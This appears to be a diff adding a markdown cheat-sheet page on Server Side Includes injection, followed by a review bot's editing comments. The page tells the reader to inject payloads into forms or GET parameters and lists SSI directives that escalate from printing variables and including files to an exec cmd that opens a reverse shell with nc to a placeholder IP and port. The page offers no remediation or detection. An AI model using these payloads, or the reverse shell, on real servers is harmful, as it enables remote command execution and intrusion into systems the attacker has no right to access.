SSI (Server Side Includes) Injection is a type of web security vulnerability that occurs when a web application allows untrusted user-supplied data to be used as part of a Server Side Include (SSI) directive
5
+
6
+
## Where to find
7
+
Usually it can be found anywhere. Just try to input the payload in the form or GET parameter
8
+
9
+
## How to exploit
10
+
1. Print a date
11
+
```
12
+
<!--#echo var="DATE_LOCAL" -->
13
+
```
14
+
15
+
2. Print all the variabels
16
+
```
17
+
<!--#printenv -->
18
+
```
19
+
20
+
3. Include a file
21
+
```
22
+
<!--#include file="includefile.html" -->
23
+
```
24
+
25
+
4. Doing a reverse shell
26
+
```
27
+
<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
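
Review bot: the "Where to find" section (added lines 7-8) says only "Usually it can be found anywhere", which gives the reader no condition to check. Tie it to the definition in the opening sentence: the issue exists where user-supplied form or GET input ends up inside a page that the server processes for SSI directives. In "How to exploit", step 2 has a typo ("variabels" should be "variables"), and the opening sentence is missing its final period. The four steps escalate from `echo` to `exec cmd`, but the visible lines include no section on remediation or detection. Consider adding one, so the page also tells the reader what to fix once a directive is shown to execute.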